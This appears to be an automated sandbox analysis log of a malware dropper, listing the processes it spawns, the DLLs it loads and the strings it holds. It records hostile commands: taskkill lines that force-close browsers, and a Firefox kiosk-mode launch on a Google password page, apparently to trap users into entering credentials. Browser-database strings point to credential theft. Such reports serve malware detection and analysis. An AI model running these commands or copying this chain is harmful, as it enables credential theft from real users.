Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.000000000128E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT url FROM urls LIMIT 1000;q
Source: f20b4c0961.exe, 00000009.00000003.2188619484.00000000059DF000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2164529303.00000000059C5000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2371854922.000000000541E000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2329105171.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2325042167.0000000005404000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2372625539.0000000005411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 2fQ8fpTWAP.exe ReversingLabs: Detection: 57%
Source: 2fQ8fpTWAP.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: e2af9f55fd.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: f20b4c0961.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: f20b4c0961.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe File read: C:\Users\user\Desktop\2fQ8fpTWAP.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\2fQ8fpTWAP.exe "C:\Users\user\Desktop\2fQ8fpTWAP.exe"
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe "C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe "C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe "C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe "C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe"
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20230927232528 -prefsHandle 2276 -prefMapHandle 2268 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {088f43d8-6bb3-42c8-b138-0dc4fcaf2c63} 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 27282f6d910 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe "C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3172 -parentBuildID 20230927232528 -prefsHandle 1404 -prefMapHandle 1368 -prefsLen 26313 -prefMapSize 238442 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0244d90d-1682-4d12-b197-beaa83464e45} 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 27294e03b10 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe "C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe "C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe"
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=f20b4c0961.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2368,i,10457971131075551606,11842695029259908311,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe "C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe"
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe "C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe"
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=f20b4c0961.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1968,i,2945064441202540453,18024779015295446793,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=f20b4c0961.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1936,i,3775567142360225983,14065324662938465342,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe "C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe "C:\Users\user\AppData\Local\Temp\1008516001\e2af9f55fd.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe "C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe "C:\Users\user\AppData\Local\Temp\1008518001\44452951d3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=f20b4c0961.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=f20b4c0961.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=f20b4c0961.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20230927232528 -prefsHandle 2276 -prefMapHandle 2268 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {088f43d8-6bb3-42c8-b138-0dc4fcaf2c63} 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 27282f6d910 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3172 -parentBuildID 20230927232528 -prefsHandle 1404 -prefMapHandle 1368 -prefsLen 26313 -prefMapSize 238442 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0244d90d-1682-4d12-b197-beaa83464e45} 6992 "\\.\pipe\gecko-crash-server-pipe.6992" 27294e03b10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2368,i,10457971131075551606,11842695029259908311,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1968,i,2945064441202540453,18024779015295446793,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1936,i,3775567142360225983,14065324662938465342,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008517001\d146970153.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
